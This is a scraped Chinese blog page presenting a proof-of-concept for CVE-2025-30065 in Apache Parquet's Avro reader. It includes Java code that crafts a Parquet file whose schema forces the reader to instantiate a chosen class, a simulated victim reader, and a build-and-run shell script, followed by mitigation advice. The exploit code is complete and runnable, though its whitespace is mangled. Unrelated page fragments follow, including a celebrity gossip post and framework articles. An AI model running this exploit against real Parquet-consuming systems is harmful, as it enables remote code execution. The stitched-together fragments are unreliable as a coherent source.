news 2026/5/1 7:18:51

Apache Parquet Avro反序列化漏洞POC:CVE-2025-30065

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Apache Parquet Avro反序列化漏洞POC:CVE-2025-30065

Apache Parquet Avro反序列化漏洞POC:CVE-2025-30065

⚠️ 风险概述

  • 严重性:CVSS评分10.0(严重☠️)
  • 攻击方式:攻击者可构造恶意Parquet文件,其嵌入的Avro模式旨在触发任意Java类的实例化。
  • 后果:在特定条件下,可导致远程代码执行(RCE)

功能特性

本POC项目完整演示了CVE-2025-30065漏洞的利用链:

  • 恶意文件生成ParquetExploitGenerator类创建包含恶意Avro模式的Parquet文件。
  • 漏洞触发模拟ParquetVictim类模拟受害者应用程序读取恶意Parquet文件。
  • 依赖管理自动化:通过Shell脚本自动处理Maven依赖解析与项目编译。
  • 跨平台payload(历史参考)PayloadRecord类展示了静态初始化块中的命令执行逻辑(在新版POC中已被更隐蔽的类实例化逻辑覆盖)。

安装指南

前置要求

  • Java 8+
  • Maven

安装步骤

项目提供了自动化构建脚本CVE-2025-30065.sh

  1. 确保脚本具有可执行权限:
    sudochmod+x CVE-2025-30065.sh
  2. 运行脚本,它将自动解析依赖、编译所有Java文件并执行完整的POC链条:
    ./CVE-2025-30065.sh

使用说明

运行自动化脚本后,将按顺序执行以下操作:

  1. 生成恶意Parquet文件:使用ParquetExploitGenerator创建一个名为exploit-jeditorpane.parquet的文件,其Avro模式的默认值字段被精心构造为实例化javax.swing.JEditorPane类。
  2. 模拟受害者读取ParquetVictim应用程序读取该文件,在反序列化Avro模式并处理默认值时触发目标类的实例化。

基础工作流程

整个漏洞利用的核心流程封装在Shell脚本中,其逻辑如下:

  1. 使用Maven解析项目依赖并生成类路径文件。
  2. 编译所有必要的Java源代码。
  3. 运行漏洞生成器创建恶意文件。
  4. 运行受害者程序触发漏洞。

核心代码

1. 恶意Parquet文件生成器 (ParquetExploitGenerator.java)

/** * @author Blackash * @version 1.3 * @license For authorized security research and educational purposes only. * * Generates a Parquet file with a crafted Avro schema to demonstrate CVE-2025-30065, * aligned with the vulnerability logic observed in the official Apache patch. * * This version avoids using custom classes and instead leverages a standard Java class * (javax.swing.JEditorPane) known to exhibit side effects when deserialized. * */importorg.apache.avro.Schema;importorg.apache.hadoop.conf.Configuration;importorg.apache.hadoop.fs.Path;importorg.apache.parquet.avro.AvroParquetWriter;importorg.apache.parquet.hadoop.ParquetWriter;importjava.io.IOException;publicclassParquetExploitGenerator{publicstaticvoidmain(String[]args)throwsIOException{// 默认输出文件名为 exploit-jeditorpane.parquetStringoutputFile=args.length>0?args[0]:"exploit-jeditorpane.parquet";// 恶意Avro模式定义:其‘trigger’字段的类型被设置为‘javax.swing.JEditorPane’记录StringmaliciousSchema="{"+"\"type\": \"record\","+"\"name\": \"ExploitRecord\","+"\"fields\": ["+" {\"name\": \"trigger\","+" \"type\": {\"type\": \"record\", \"name\": \"javax.swing.JEditorPane\", \"fields\": []},"+" \"default\": {}"// 默认值为空对象,触发目标类实例化+" }"+"]"+"}";// 解析模式Schemaschema=newSchema.Parser().parse(maliciousSchema);Pathpath=newPath(outputFile);Configurationconf=newConfiguration();// 使用AvroParquetWriter写入文件try(ParquetWriter<Object>writer=AvroParquetWriter.builder(path).withSchema(schema).withConf(conf).build()){writer.write(null);}System.out.println("[+] Malicious Parquet file generated: "+outputFile);System.out.println("[!] Schema instantiates javax.swing.JEditorPane via default value.");}}

2. 受害者应用程序 (ParquetVictim.java)

packagevictim;importorg.apache.avro.generic.GenericRecord;importorg.apache.parquet.avro.AvroParquetReader;importorg.apache.parquet.hadoop.ParquetReader;importorg.apache.hadoop.conf.Configuration;importorg.apache.hadoop.fs.Path;publicclassParquetVictim{publicstaticvoidmain(String[]args)throwsException{// 读取恶意Parquet文件Pathpath=newPath("exploit.parquet");ParquetReader<GenericRecord>reader=AvroParquetReader.<GenericRecord>builder(path).withConf(newConfiguration()).build();// 读取记录,此操作会触发Avro模式中默认值的反序列化,从而实例化恶意类GenericRecordrecord=reader.read();System.out.println("Record loaded: "+record);// this triggers instantiation of default}}

3. 自动化构建与执行脚本 (CVE-2025-30065.sh)

#!/bin/bashBASE_DIR=$(pwd)BUILD_DIR="$BASE_DIR/build/classes"CP_FILE="$BASE_DIR/cp.txt"JAR_DEPS=""# 检查Maven并解析依赖ifcommand-v mvn&>/dev/null;thenecho"[+] Resolving dependencies with Maven..."mvn dependency:build-classpath -Dmdep.outputFile=cp.txt>/dev/nullif[!-f"$CP_FILE"];thenecho"[-] Failed to generate classpath (cp.txt)."exit1fiJAR_DEPS=$(cat"$CP_FILE")elseecho"[-] Maven not found. Please install Maven and run again."exit1fi# 创建构建目录mkdir-p"$BUILD_DIR"echo"[+] Compiling PayloadRecord.java..."javac -d"$BUILD_DIR"PayloadRecord.java||exit1echo"[+] Compiling ParquetExploitGenerator..."javac -cp".:$BUILD_DIR:$JAR_DEPS"-d"$BUILD_DIR"POC-CVE-2025-30065-ParquetExploitGenerator.java||exit1echo"[+] Running exploit generator..."java -cp".:$BUILD_DIR:$JAR_DEPS"POC-CVE-2025-30065-ParquetExploitGenerator||exit1echo"[+] Compiling ParquetVictim.java..."javac -cp".:$BUILD_DIR:$JAR_DEPS"-d"$BUILD_DIR"ParquetVictim.java||exit1echo"[+] Running victim (payload should trigger)..."java -cp".:$BUILD_DIR:$JAR_DEPS"ParquetVictim

安全建议与缓解措施

  1. 立即更新:将 Apache Parquet Java 库升级至1.15.1 或更高版本
  2. 启用类允许列表
    • 配置org.apache.parquet.avro.SERIALIZABLE_PACKAGES,仅允许受信任的包(避免使用*)。
    • 使用org.apache.avro.TRUSTED_PACKAGES来限制Avro模式行为。
  3. 来源控制:避免处理来自不可信来源的Parquet文件,或对文件进行安全扫描。

免责声明

本项目内容仅供教育研究及安全意识提升之目的,旨在揭示Apache Parquet中CVE-2025-30065安全漏洞的原理。任何信息均不鼓励或支持恶意活动、未经授权的系统访问或漏洞利用
请确保您拥有测试目标系统的授权,并遵循负责任的披露流程及法律边界。作者不对信息的任何误用负责。FINISHED
6HFtX5dABrKlqXeO5PUv/84SoIo+TE3firf/5vX8AZ4lCdOI9nDKouWcoabNKkPM
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/18 16:48:22

王宝强儿子已长大,是谁的亲儿子一目了然,观众太像了

在娱乐圈的纷繁喧嚣中&#xff0c;王宝强一直是备受瞩目的存在。他以朴实憨厚的形象和扎实的演技&#xff0c;在观众心中留下了深刻的印记。而他的儿子&#xff0c;随着时光的流转渐渐长大&#xff0c;其模样更是引发了大众的广泛讨论&#xff0c;大家纷纷感慨&#xff1a;是谁…

作者头像 李华
网站建设 2026/4/24 16:38:24

从夯到拉,锐评13个 Java Web 框架

先叠个甲以下评价基于技术特性、生态成熟度、市场采用情况等客观维度&#xff0c;不代表对任何框架的贬低。技术选型应根据具体场景&#xff0c;没有银弹。不同项目有不同需求&#xff0c;合适的才是最好的。评价维度说明性能表现&#xff1a;吞吐量、响应时间、资源占用生态成…

作者头像 李华
网站建设 2026/4/18 7:35:29

肝了!40 个 SpringBoot 常用注解!!

一、Spring Web MVC 与 Spring Bean 注解 Spring Web MVC 注解 RequestMapping RequestMapping注解的主要用途是将Web请求与请求处理类中的方法进行映射。Spring MVC和Spring WebFlux都通过RquestMappingHandlerMapping和RequestMappingHndlerAdapter两个类来提供对RequestM…

作者头像 李华
网站建设 2026/4/16 15:08:49

百度开源上传组件如何处理内网超大文件的续传?

《一个前端打工人的奇幻外包历险记》 需求分析&#xff1a;这需求是灭霸提的吧&#xff1f; 各位同行大家好&#xff01;我是一名在福建"苟延残喘"的个人前端开发者。最近接了个外包项目&#xff0c;看到需求文档时我的表情是这样的&#xff1a;&#x1f628; → &…

作者头像 李华
网站建设 2026/4/23 19:05:40

知识图谱基础

扫描下载文档详情页: https://www.didaidea.com/wenku/16402.html

作者头像 李华